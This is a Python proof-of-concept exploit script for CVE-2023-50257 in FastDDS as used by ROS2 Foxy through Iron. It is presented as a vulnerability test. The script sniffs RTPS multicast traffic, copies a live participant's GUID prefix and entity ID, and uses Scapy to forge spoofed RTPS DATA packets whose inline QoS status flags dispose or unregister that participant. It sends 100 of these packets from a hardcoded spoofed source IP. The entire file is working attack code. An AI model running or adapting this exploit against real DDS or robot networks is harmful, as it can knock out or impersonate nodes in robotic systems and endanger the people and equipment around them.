#!/usr/bin/env python3
import os, sys, time, binascii, struct
from scapy.all import sniff, sendp, Ether, IP, UDP, Raw, get_if_list
from scapy.contrib.rtps import *

# ================================
# Global Setting
# ================================
CAPTURE_DURATION    = 5
ATTACK_PACKET_COUNT = 100
PACKET_INTERVAL     = 0.1
MULTICAST_IP        = "239.255.0.1"
MULTICAST_PORT      = 7400
# ================================


def print_banner():
    print(f"\033[95m=== CVE-2023-50257 TEST ===\033[0m")
    print("Affected ROS2/DDS Version (FastDDS / RMW-FastDDS):")
    print("  FOXY     : 2.1.4 ↓ / 1.3.2 ↓")
    print("  GALACTIC : 2.3.6 ↓ / 5.0.2 ↓")
    print("  HUMBLE   : 2.6.6 ↓ / 6.2.3 ↓")
    print("  IRON     : 2.10.2 ↓ / 7.1.1 ↓")
    print()

def check_root():
    if os.geteuid() != 0:
        print(f"\033[91m[Error] Root privileges required.\033[0m")
        sys.exit(1)

def start_capture():
    print(f"\033[94m[*] Starting Packet Capture: {MULTICAST_IP}:{MULTICAST_PORT}\033[0m")
    ifaces = [iface for iface in get_if_list() ]
    pkts = sniff(
        filter   = f"host {MULTICAST_IP} and port {MULTICAST_PORT}",
        iface    = ifaces,
        timeout  = CAPTURE_DURATION,
        store    = True
    )
    for pkt in pkts:
        if UDP in pkt and Raw in pkt and bytes(pkt[Raw].load).startswith(b"RTPS"):
            return pkt, pkt.sniffed_on

    print(f"\033[91m[Error] There no RTPS Packet on network.\033[0m")
    sys.exit(1)

def extract_info(pkt):
    """Extract GUID prefix and Entity ID."""
    data = bytes(pkt[Raw].load)
    return {
        'src_port':     pkt[UDP].sport,
        'guid_prefix':  data[8:20],
        'entity_id':    data[44:48]
    }

def define_rtps_classes(hostId, appId, instanceId, entityId):
    class PacketSENTINEL(PIDPacketBase):
        name = "PID_SENTINEL"
        fields_desc = [ EField(XIntField("parameter_id", 0x0001), endianness=FORMAT_LE) ]

    class participantId(EPacket):
        name = "participantId"
        fields_desc = [
            XIntField("hostId", hostId),
            XIntField("appId", appId),
            XIntField("instanceId", instanceId),
            XIntField("entity", entityId),
        ]

    class participantId2(EPacket):
        name = "participantId"
        fields_desc = [
            XIntField("hostId", hostId),
            XIntField("appId", appId),
            XIntField("instanceId", instanceId),
            XIntField("entity", 0x00001c1),
        ]

    class UnknownPacket(EPacket):
        name = "Unknown"
        fields_desc = [
            EField(ShortField("parameter_id", 0x0083), endianness=FORMAT_LE),
            EField(ShortField("parameter_length", 0x0018), endianness=FORMAT_LE),
            PacketListField("participantId", [participantId()], participantId),
            XIntField("parameter1",0), XIntField("parameter2",0x01000000),
        ]

    class KeyHashPacket(EPacket):
        name = "Data Packet"
        fields_desc = [
            EField(ShortField("parameter_id", 0x0070), endianness=FORMAT_LE),
            EField(ShortField("parameter_length", 0x0010), endianness=FORMAT_LE),
            PacketListField("participantId", [participantId2()], participantId2),
        ]

    class StatusPacket(EPacket):
        name = "status info"
        fields_desc = [
            EField(ShortField("parameter_id", 0x0071), endianness=FORMAT_LE),
            EField(ShortField("parameter_length", 0x0004), endianness=FORMAT_LE),
            XIntField("flags", 3),
        ]

    class InlineQoSPacket(EPacket):
        name = "Inline QoS"
        fields_desc = [
            PacketField("UnknownPacket", UnknownPacket(), UnknownPacket),
            PacketField("KeyHashPacket", KeyHashPacket(), KeyHashPacket),
            PacketField("StatusPacket", StatusPacket(), StatusPacket),
            PacketField("sentinel", PacketSENTINEL(), PacketSENTINEL),
        ]

    class RTPS(Packet):
        name = "RTPS Header"
        fields_desc = [
            XIntField("magic", 0x52545053), XByteField("major", 2),
            XByteField("minor", 3), XShortField("vendor_id",0x010f),
            XIntField("hostId",hostId), XIntField("appId",appId),
            XIntField("instanceId",instanceId),
        ]

    class RTPSSubMessage_DATA(EPacket):
        name = "RTPS DATA"
        fields_desc = [
            XByteField("submessageId1",0x09), XByteField("flags1",1),
            ShortField("octetsToNextHeader1",0x0800),
            XLongField("Timestamp",0x59000168c759aba0),
            XByteField("submessageId2",0x15), XByteField("flags2",3),
            ShortField("octetsToNextHeader2",0x5000),
            XNBytesField("extraFlags",0,2),
            EField(ShortField("octetsToInlineQoS",0x1000), endianness_from=e_flags),
            X3BytesField("readerEntityIdKey",0x000100),
            XByteField("readerEntityIdKind",0xc7),
            X3BytesField("writerEntityIdKey",0x000100),
            XByteField("writerEntityIdKind",0xc2),
            EField(IntField("writerSeqNumHi",0), endianness_from=e_flags),
            EField(IntField("writerSeqNumLow",0x02000000), endianness_from=e_flags),
            PacketField("inline_qos", InlineQoSPacket(), InlineQoSPacket),
        ]
    return RTPS, RTPSSubMessage_DATA

def send_attack(info, iface):
    """Build and send RTPS attack packets."""
    
    gp = info['guid_prefix']
    hostId, appId, instanceId = struct.unpack("!III", gp)
    entityId = struct.unpack("!I", info['entity_id'])[0]
    RTPS, RTPSSubMessage_DATA = define_rtps_classes(hostId, appId, instanceId, entityId)
    pkt = (
        Ether() /
        IP(src="172.23.184.22", dst=MULTICAST_IP) /
        UDP(sport=info['src_port'], dport=MULTICAST_PORT) /
        RTPS() /
        RTPSSubMessage_DATA()
    )
    print(f"\033[93m'[!] Send Attack RTPS packet...\033[0m")
    sendp(pkt, iface=iface, count=ATTACK_PACKET_COUNT, inter=PACKET_INTERVAL)
    print(f"\033[92m[+] Sent {ATTACK_PACKET_COUNT} packets.\033[0m")

if __name__ == "__main__":
    print_banner()
    check_root()
    pkt, iface = start_capture()
    info = extract_info(pkt)
    print(f"[*] Found RTPS on interface: {iface}")
    send_attack(info, iface)

